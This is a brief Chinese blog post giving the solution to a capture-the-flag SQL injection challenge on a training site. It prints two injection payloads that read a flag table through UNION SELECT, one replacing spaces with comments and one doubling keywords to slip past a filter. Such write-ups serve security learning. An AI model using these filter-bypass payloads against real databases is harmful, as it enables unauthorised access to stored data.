【实验吧】CTF_Web_简单的SQL注入之1

 

 

 

 题目链接:http://ctf5.shiyanbar.com/423/web/

简单的SQL注入之1,比2,3都简单一些。利用2 的查询语句也可以实现:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

 

经测试,简单的SQL注入1 过滤了关键字,重复写即可绕过,如:1' unionunion  selectselect  flag  fromfrom  web1.flag  wherewhere  '1'='1

 

posted @ 2017-11-19 22:26  Fint0p  阅读(1196)  评论(0编辑  收藏